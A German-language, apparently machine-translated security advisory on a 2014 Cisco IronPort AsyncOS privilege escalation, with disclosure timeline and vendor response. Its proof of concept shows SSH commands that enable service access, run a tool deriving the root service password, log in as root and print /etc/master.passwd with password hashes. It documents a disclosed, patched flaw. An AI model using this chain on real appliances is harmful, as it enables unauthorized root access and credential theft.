Aktualisiert für Linux
Cisco Ironport Apparge Privilegs Escalation Schwachstellen Anbieter: Cisco -Produktwebseite: http://www.cisco.com Betroffene Version (n): Cisco Ironport ESA - Asyncos 8.5.5-280 Cisco Ironport WSA - ASyncos 8.0.5-075 Cisco Ironport - Asyncos 8.3.6-0 Datum: 22/05/2014 Credits: Glafkos Charalambous CVE: Nicht von Cisco zugewiesen
Offenlegungszeitleiste: 19-05-2014: Lieferantenbenachrichtigung 20-05-2014: Anbieter Antwort/Feedback 27-08-2014: Lieferantenfix/Patch 24-01-2015: öffentliche Offenlegung
Beschreibung: Cisco Ironport -Geräte sind anfällig für authentifizierte "Admin" -Regileger -Eskalation. Durch Aktivieren des Dienstkontos von der GUI oder der CLI kann ein Administrator den Stammzugriff auf die Appliance erhalten und so alle vorhandenen "Administrator" -Kontobeschränkungen umgehen. Die Sicherheitsanfälligkeit ist auf eine schwache Algorithmus -Implementierung im Prozess der Kennwortgenerierung zurückzuführen.
Verkäuferreaktion: Wie erwartet wird dies nicht als Schwachstellen, sondern als Sicherheitshärtungsproblem angesehen. Als solches haben wir kein CVE zugewiesen, aber ich habe dafür gesorgt, dass dies auf SMA, ESA und WSA festgelegt ist. Das Fix enthielt mehrere Änderungen, wie z. B. den besseren Schutz des Algorithmus im Binary, das Ändern des Algorithmus selbst, um robuster zu sein, und die Komplexität des Kennworts durchzusetzen, wenn der Administrator die Passphrase festlegte und das Konto aktiviert.
[SD] HINWEIS: Es werden administrative Anmeldeinformationen benötigt, um den Zugriff auf Support-Repräsentant zu aktivieren und die Pass-Phrase einzurichten, die zum Berechnen des endgültigen Kennworts verwendet wird. [GC] Der noch Administrator Benutzer hat nur begrenzte Berechtigungen für die Appliance, und auch mit dem Standardkennwort können Anmeldeinformationen beeinträchtigt werden, was zu einem vollständigen Root -Zugriff führt.
[SD] Dieses Problem wird von Cisco Bug ID für die ESA verfolgt: CSCUO96011 für die SMA von Cisco Bug ID: CSCUO96056 und für WSA von Cisco Bug ID CSCUO90528
Technische Details: Durch Anmelden bei der Appliance mithilfe des Standardkennworts "Ironport" oder des von Benutzer angegebenen Einsatzes gibt es eine Option, um den Customer Support Remote -Zugriff zu aktivieren. Diese Option finden Sie unter Hilfe und Support -> Remote -Zugriff auf der GUI oder mithilfe des CLI -Konsoleskontos "EnabledIag" und der Ausgabe des Befehlsdienstes. Um diesen Service zu aktivieren, ist ein temporäres Benutzerkennwort erforderlich, das zusammen mit der Seriennummer der Appliance an Cisco TechSupport zur Verfügung gestellt werden sollte, um sich remote zu verbinden und mit der Appliance zu authentifizieren.
Ein temporäres Passwort und die serielle Anzahl des Geräts durch Aktivieren des Servicekontos kann ein Angreifer wiederum den vollständigen Root -Zugriff erhalten und es potenziell schädigen, es Backdoor usw.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin